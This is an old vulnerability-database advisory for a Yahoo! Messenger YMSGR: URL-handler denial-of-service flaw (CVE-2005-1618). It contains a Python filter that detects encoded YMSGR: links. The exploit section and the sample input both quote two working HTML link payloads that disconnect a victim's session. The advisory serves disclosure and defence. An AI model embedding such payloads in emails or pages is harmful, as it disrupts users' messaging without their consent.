Yahoo! Messenger URL Handler Remote Denial-of-Service Vulnerability

Vulnerability ID: 1108778
Vulnerability type: Other
Published: 2005-05-13
Updated: 2007-02-20
CVE ID: CVE-2005-1618
CNNVD-ID: CNNVD-200505-1057
Platform: Windows
CVSS score: 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/25658
https://www.securityfocus.com/bid/13626
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-1057
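|Vulnerability details
Yahoo! Messenger is a free instant messaging program. A denial-of-service vulnerability exists in the way Yahoo! Messenger handles the parameters of links that use the YMSGR: URL handler. Through a specially crafted link, an attacker can cause specially crafted messages to be sent to Yahoo!'s YMSG servers. When Yahoo! receives these messages, it immediately disconnects the current session.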
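
As an added example (not part of the original advisory or of any Yahoo! code), a mail or web content filter can percent-decode `YMSGR:` links before matching them, since the two sample links quoted in the exploit section of this page decode to the same handler call. The `find_ymsgr_links` helper, the delimiter-only heuristic and the sample input are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote


class _HrefCollector(HTMLParser):
    """Collects every href attribute value found in <a> tags."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.hrefs.extend(v for k, v in attrs if k == "href" and v)


def find_ymsgr_links(html):
    """Return one dict per YMSGR: link with its decoded command, params and verdict."""
    collector = _HrefCollector()
    collector.feed(html)
    findings = []
    for raw in collector.hrefs:
        scheme, sep, rest = raw.strip().partition(":")
        if not sep or scheme.lower() != "ymsgr":
            continue
        decoded = unquote(rest)  # e.g. %63%68%61%74%3F -> chat?
        command, _, params = decoded.partition("?")
        # Heuristic (assumption): parameters made only of delimiters,
        # as in the sample links quoted on this page.
        suspicious = bool(params) and not re.search(r"[A-Za-z0-9]", params)
        findings.append({"raw": raw, "command": command.lower(), "params": params,
                         "encoded": decoded != rest, "suspicious": suspicious})
    return findings


# Constructed sample: the two links quoted on this page plus two benign links.
SAMPLE = """
<a href="YMSGR:%63%68%61%74%3F:::%26%26%26%26">Click Here</a>
<a href="YMSGR:Chat?:::%26%26%26%26">Click Here</a>
<a href="ymsgr:sendim?example_user">Message me</a>
<a href="https://example.com/">Home</a>
"""

if __name__ == "__main__":
    for finding in find_ymsgr_links(SAMPLE):
        print(finding)
```

Matching on the raw attribute value alone would miss the first link, whose handler name is fully percent-encoded.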
|Exploit (EXP)
source: http://www.securityfocus.com/bid/13626/info

Yahoo! Messenger is prone to a denial-of-service vulnerability because the application fails to handle exceptional conditions.

A remote user can cause Yahoo! Messenger to disconnect through malicious emails or web pages.

This issue is reported to affect Yahoo! Messenger versions 5.x to 6.0 for Windows; other versions on other operating systems may also be affected.

<a href="YMSGR:%63%68%61%74%3F:::%26%26%26%26">Click Here</a>
<a href="YMSGR:Chat?:::%26%26%26%26">Click Here</a>
|Affected products
Yahoo! Messenger 6.0.0.1921
Yahoo! Messenger 6.0.0.1750
Yahoo! Messenger 6.0.0.1643
Yahoo! Messenger 6.0
Yahoo! Messenger 5.6.0.1358
Yahoo! Messenger 5.6.0.1356
|References

Source: BUGTRAQ
Name: 20050513 Yahoo! Messenger URL Handler Remote DoS Vulnerability
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=111601904204055&w=2
Source: BID
Name: 13626
Link: http://www.securityfocus.com/bid/13626
Source: OSVDB
Name: 16816
Link: http://www.osvdb.org/16816